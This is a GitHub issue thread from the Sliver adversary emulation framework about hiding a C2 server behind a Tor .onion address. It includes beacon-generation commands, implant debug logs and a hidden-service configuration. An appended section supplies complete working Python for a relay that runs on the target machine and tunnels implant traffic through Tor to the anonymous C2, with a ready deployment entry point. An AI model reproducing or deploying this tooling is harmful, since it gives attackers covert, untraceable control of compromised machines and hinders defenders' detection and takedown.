BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0

Beacon through SOCKS5 Proxy, C2 behind .onion? #1698

Open pixelBaron117 opened 1 month ago

pixelBaron117 commented 1 month ago

Hello,

I've done some research but couldn't find a clear answer to my question.

Sliver supports handling HTTP proxies, but apparently not SOCKS5 proxies.

Therefore, I would like to know if it is possible to configure a beacon to use a pre-installed SOCKS5 proxy on the client.

For example:

generate beacon --http dasdasdas.onion --proxy socks5://127.0.0.1:9050 --os windows --arch amd64 --format exe --save /var/www/html

The goal is to keep the C2 anonymous without expensive intermediary servers.

As a starting solution, I found tor2web, but the domains are not stable over time, which reduces the robustness of the link (if a domain no longer works, then the beacon is no longer accessible). Setting up a tor2web reduces anonymity and has a certain cost.

Thank you in advance.

pixelBaron117 commented 1 month ago

generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 11   http   tcp        6969          

output :

2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s

It seems the proxy is correctly used, but the sessions can't connect to the hidden service.

The hidden service Tor configuration:

torrc:
# This is the configuration for Tor
SocksPort 9050

# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969

Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.

pixelBaron117 commented 3 weeks ago

While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent.

How It Works:

Agent Communication:
    The Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.

Proxy on the Target:
    A Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.

Redirection Through Tor:
    The proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).

Data Forwarding:
    The script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.

Detailed Setup:

Sliver C2 Server:

The Sliver C2 server listens on port 9999 for incoming connections.

Tor Hidden Service:

Configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server.
The .onion address of this hidden service is used by the proxy script to route traffic through Tor.

Python Proxy Script:

The proxy script runs on the target machine.
It listens on 127.0.0.1:6666 for connections from the Sliver agent.
When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network.
It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.

This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.

I am currently testing its robustness, not sure if it will work great...
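The relay described in the comment above, as an added example that is not pixelBaron117's script and not part of Sliver. It speaks SOCKS5 (RFC 1928) itself instead of going through PySocks, so the point that matters for an .onion target is visible in the code: the hostname is carried inside the CONNECT request (ATYP 0x03) and resolved by Tor, never by the implant host. That is the difference from the earlier debug log, where `dial tcp: lookup [hidden].onion: no such host` shows the implant resolving the name locally. The listen port 6666, the Tor SocksPort 127.0.0.1:9050, the hidden service port 9999 and the placeholder `.onion` name are assumptions taken from the thread; the in-process fake SocksPort in `_fake_tor` and the `demo()` driver are constructed so the exchange can be exercised offline.

```python
from __future__ import annotations
import socket
import struct
import threading

SOCKS_VER, ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x05, 0x01, 0x03, 0x04


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; SOCKS5 messages are length-prefixed, so partial reads must be assembled."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-message")
        buf += chunk
    return buf


def build_connect_request(host: str, port: int) -> bytes:
    """SOCKS5 CONNECT with ATYP=0x03 (domain name): the proxy resolves host, the client never does."""
    name = host.encode("ascii")
    if not 0 < len(name) < 256:
        raise ValueError("hostname must be 1..255 bytes")
    return struct.pack("!BBBBB", SOCKS_VER, 0x01, 0x00, ATYP_DOMAIN, len(name)) + name + struct.pack("!H", port)


def parse_connect_request(data: bytes) -> tuple[str, int]:
    """Inverse of build_connect_request, used by the constructed fake Tor below."""
    ver, cmd, _rsv, atyp, n = struct.unpack("!BBBBB", data[:5])
    if ver != SOCKS_VER or cmd != 0x01 or atyp != ATYP_DOMAIN:
        raise ValueError("unsupported SOCKS5 request")
    (port,) = struct.unpack("!H", data[5 + n:7 + n])
    return data[5:5 + n].decode("ascii"), port


def socks5_connect(proxy: tuple[str, int], host: str, port: int, timeout: float = 60.0) -> socket.socket:
    """Open a TCP stream to host:port through a no-auth SOCKS5 proxy and return the connected socket."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(bytes([SOCKS_VER, 0x01, 0x00]))  # VER, NMETHODS=1, METHOD=no authentication
        ver, method = recv_exact(s, 2)
        if ver != SOCKS_VER or method != 0x00:
            raise ConnectionError("proxy rejected the no-auth method")
        s.sendall(build_connect_request(host, port))
        ver, rep, _rsv, atyp = recv_exact(s, 4)  # reply header; BND.ADDR length depends on ATYP
        if atyp == ATYP_IPV4:
            recv_exact(s, 4 + 2)
        elif atyp == ATYP_DOMAIN:
            recv_exact(s, recv_exact(s, 1)[0] + 2)
        elif atyp == ATYP_IPV6:
            recv_exact(s, 16 + 2)
        else:
            raise ConnectionError(f"malformed SOCKS5 reply, ATYP={atyp}")
        if ver != SOCKS_VER or rep != 0x00:  # e.g. 0x04 host unreachable when the .onion is down
            raise ConnectionError(f"SOCKS5 CONNECT failed, REP=0x{rep:02x}")
        s.settimeout(None)  # long-lived C2 stream: no idle read timeout
        return s
    except Exception:
        s.close()
        raise


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until EOF, then half-close dst so the other end sees EOF too."""
    try:
        while chunk := src.recv(65536):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(agent: socket.socket, proxy: tuple[str, int], host: str, port: int) -> None:
    try:
        upstream = socks5_connect(proxy, host, port)
    except OSError:
        agent.close()  # implant sees a failed connect and retries on its own reconnect interval
        return
    t = threading.Thread(target=_pump, args=(upstream, agent), daemon=True)
    t.start()
    _pump(agent, upstream)
    t.join()
    agent.close()
    upstream.close()


def start_relay(listen: tuple[str, int], proxy: tuple[str, int], host: str, port: int) -> socket.socket:
    """Listen on `listen` (keep it loopback-only) and relay each accepted connection to host:port via proxy."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(listen)
    ls.listen(16)

    def loop() -> None:
        while True:
            try:
                conn, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=_handle, args=(conn, proxy, host, port), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return ls


def _fake_tor(ls: socket.socket, seen: dict) -> None:
    """Constructed stand-in for Tor's SocksPort: no-auth handshake, record the CONNECT target, then echo."""
    conn, _ = ls.accept()
    with conn:
        recv_exact(conn, 3)  # our client offers exactly one method
        conn.sendall(bytes([SOCKS_VER, 0x00]))
        hdr = recv_exact(conn, 5)
        seen["host"], seen["port"] = parse_connect_request(hdr + recv_exact(conn, hdr[4] + 2))
        conn.sendall(bytes([SOCKS_VER, 0x00, 0x00, ATYP_IPV4]) + b"\0\0\0\0\0\0")  # REP=succeeded
        _pump(conn, conn)  # echo everything back through the same stream


def demo(onion: str = "exampleexampleexample.onion", port: int = 9999) -> tuple[str, int, bytes]:
    """Fake Tor + relay + a client in one process; returns the target Tor saw and what the client got back."""
    tor_ls = socket.socket()
    tor_ls.bind(("127.0.0.1", 0))
    tor_ls.listen(1)
    seen: dict = {}
    threading.Thread(target=_fake_tor, args=(tor_ls, seen), daemon=True).start()
    relay_ls = start_relay(("127.0.0.1", 0), tor_ls.getsockname(), onion, port)
    with socket.create_connection(relay_ls.getsockname(), timeout=5) as agent:
        agent.sendall(b"hello via tor")
        agent.shutdown(socket.SHUT_WR)
        echoed = b""
        while chunk := agent.recv(4096):
            echoed += chunk
    relay_ls.close()
    tor_ls.close()
    return seen["host"], seen["port"], echoed


if __name__ == "__main__":
    # Real deployment (assumed values from the thread): implant -> 127.0.0.1:6666 -> Tor 9050 -> <onion>:9999
    ls = start_relay(("127.0.0.1", 6666), ("127.0.0.1", 9050), "exampleexampleexample.onion", 9999)
    threading.Event().wait()
```

Because the relay forwards bytes unchanged, the mTLS handshake still terminates at the Sliver server, so the relay cannot read or alter the session; it only needs the ability to reach the local SocksPort. Binding to 127.0.0.1 keeps any other process on the host from using the relay as an open door to the hidden service.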